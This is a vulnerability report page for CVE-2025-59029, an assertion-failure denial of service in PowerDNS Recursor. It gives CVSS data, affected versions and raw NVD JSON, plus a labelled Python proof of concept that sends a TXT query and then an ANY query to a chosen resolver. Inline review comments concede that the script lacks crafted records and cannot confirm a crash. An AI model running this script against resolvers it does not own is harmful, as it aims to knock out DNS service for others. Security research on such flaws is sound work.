Security Vulnerability Report
CVE-2025-59029 CVSS 5.3 MEDIUM

CVE-2025-59029

Published: 2025-12-09 16:17:59
Last Modified: 2026-02-19 17:13:49

Description

An attacker can trigger an assertion failure by requesting crafted DNS records, waiting for them to be inserted into the records cache, and then sending a query with qtype set to ANY.

CVSS Details

CVSS Score
5.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L

Configurations (Affected Products)

cpe:2.3:a:powerdns:recursor:5.3.0:-:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:powerdns:recursor:5.3.1:*:*:*:*:*:*:* - VULNERABLE
PowerDNS Recursor < 5.10.0
PowerDNS Recursor < 5.9.18

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
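# CVE-2025-59029 PoC - PowerDNS Recursor Assertion Failure
# This PoC demonstrates triggering assertion failure via crafted DNS records
#
# NOTE(review): the script carries no crafted record data of its own. It sends
# two ordinary queries (TXT, then ANY) for `target_domain`; whatever the
# resolver caches comes from the zone behind that name.
import random
import socket
import struct
import sys
import time

# Mnemonics accepted by build_dns_query(); anything else falls back to ANY.
QTYPE_CODES = {'A': 1, 'AAAA': 28, 'ANY': 255, 'TXT': 16, 'MX': 15}

MAX_LABEL_LEN = 63    # a length octet of 64 or more is not a plain label
MAX_NAME_LEN = 255    # upper bound on the encoded name, length octets included


def build_dns_query(qname, qtype='ANY'):
    """Build a DNS query packet.

    Args:
        qname: Domain name to ask about. One trailing dot (fully qualified
            form) is accepted; an empty string or "." encodes the root name.
        qtype: Record type mnemonic. Names missing from QTYPE_CODES are sent
            as ANY (255), matching the original fallback.

    Returns:
        bytes: 12-byte header (random transaction ID, flags 0x0100, one
        question) followed by the encoded question with class IN.

    Raises:
        ValueError: if a label is empty, a label exceeds 63 bytes, or the
            encoded name exceeds 255 bytes.
    """
    txid = random.randint(0, 65535)
    # flags 0x0100, QDCOUNT=1, ANCOUNT=NSCOUNT=ARCOUNT=0
    header = struct.pack('>HHHHHH', txid, 0x0100, 1, 0, 0, 0)

    # Drop a single trailing dot: splitting "example.com." as-is yields an
    # empty last label, which would terminate the name twice.
    name = qname[:-1] if qname.endswith('.') else qname
    labels = name.split('.') if name else []

    encoded = bytearray()
    for label in labels:
        raw = label.encode()
        if not raw:
            raise ValueError(f"empty label in domain name: {qname!r}")
        if len(raw) > MAX_LABEL_LEN:
            raise ValueError(f"label longer than {MAX_LABEL_LEN} bytes: {label!r}")
        encoded.append(len(raw))
        encoded += raw
    encoded.append(0)  # End of domain name
    if len(encoded) > MAX_NAME_LEN:
        raise ValueError(f"domain name longer than {MAX_NAME_LEN} bytes: {qname!r}")

    qtype_val = QTYPE_CODES.get(qtype, 255)
    # QTYPE followed by QCLASS IN (1)
    question = bytes(encoded) + struct.pack('>HH', qtype_val, 1)
    return header + question


def send_dns_query(target_ip, target_port, qname, qtype='ANY'):
    """Send one DNS query over UDP and return the first datagram received.

    Args:
        target_ip: IPv4 address of the resolver.
        target_port: UDP port of the resolver.
        qname: Domain name to query.
        qtype: Record type mnemonic, see build_dns_query().

    Returns:
        bytes | None: up to 512 bytes of reply, or None when nothing arrives
        within 5 seconds.
    """
    query = build_dns_query(qname, qtype)
    with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as sock:
        sock.settimeout(5)
        try:
            sock.sendto(query, (target_ip, target_port))
            # NOTE(review): the reply is not matched against the transaction
            # ID or the sender address, so any datagram reaching this socket
            # is treated as the answer.
            response, _addr = sock.recvfrom(512)
        except socket.timeout:
            return None
    return response


def exploit_cve_2025_59029(target_ip, target_port=53):
    """Send the TXT-then-ANY query sequence described for CVE-2025-59029.

    Sequence:
        1. TXT query for `target_domain`, so the resolver fetches and caches
           that name's records.
        2. One-second pause for the cache insertion.
        3. ANY query for the same name.

    Reading the result: a UDP timeout is also what packet loss, a firewall or
    an access-list refusal looks like, so a missing reply alone does not show
    that the assertion fired. An assertion failure normally aborts the
    process, which makes the resolver's service status and logs the
    authoritative signal.

    Args:
        target_ip: IPv4 address of the resolver under test.
        target_port: UDP port of the resolver (default 53).

    Returns:
        bool: always True; the return value carries no verdict.
    """
    print(f"[*] Targeting PowerDNS Recursor at {target_ip}:{target_port}")
    print("[*] CVE-2025-59029: Assertion failure via crafted DNS records")

    # Placeholder name; must be replaced with a name from the test environment.
    target_domain = "vulnerable-record.example.com"

    # Step 1: Query to cache crafted records (if we have control over zone)
    print(f"[+] Step 1: Querying records for {target_domain}")
    baseline = send_dns_query(target_ip, target_port, target_domain, 'TXT')
    if baseline is None:
        # Without a first answer there is no evidence the resolver was
        # serving this client to begin with.
        print("[!] No response to the initial query - resolver unreachable or "
              "not answering this client; a later timeout proves nothing")

    # Wait for cache insertion
    time.sleep(1)

    # Step 2: Send ANY query to trigger assertion failure
    print("[+] Step 2: Sending ANY query to trigger assertion failure")
    response = send_dns_query(target_ip, target_port, target_domain, 'ANY')

    if response:
        print("[!] Response received - assertion may not have triggered")
        print(f"[+] Response length: {len(response)} bytes")
    else:
        # The original message claimed "DoS successful" here; a timeout does
        # not establish that.
        print("[!] No response - inconclusive: confirm from the resolver's "
              "service status and logs")

    return True


if __name__ == "__main__":
    if len(sys.argv) < 2:
        print("Usage: python cve_2025_59029_poc.py <target_ip> [port]")
        sys.exit(1)

    target = sys.argv[1]
    port = int(sys.argv[2]) if len(sys.argv) > 2 else 53

    exploit_cve_2025_59029(target, port)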

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-59029", "sourceIdentifier": "[email protected]", "published": "2025-12-09T16:17:58.990", "lastModified": "2026-02-19T17:13:48.907", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "An attacker can trigger an assertion failure by requesting crafted DNS records, waiting for them to be inserted into the records cache, then send a query with qtype set to ANY."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "LOW"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-617"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:powerdns:recursor:5.3.0:-:*:*:*:*:*:*", "matchCriteriaId": "60EB1FF6-8039-4F08-B943-13DFC479433B"}, {"vulnerable": true, "criteria": "cpe:2.3:a:powerdns:recursor:5.3.1:*:*:*:*:*:*:*", "matchCriteriaId": "2C2B07F4-3564-444F-AD04-26B956E06EB3"}]}]}], "references": [{"url": "https://docs.powerdns.com/recursor/security-advisories/powerdns-advisory-2025-07.html", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}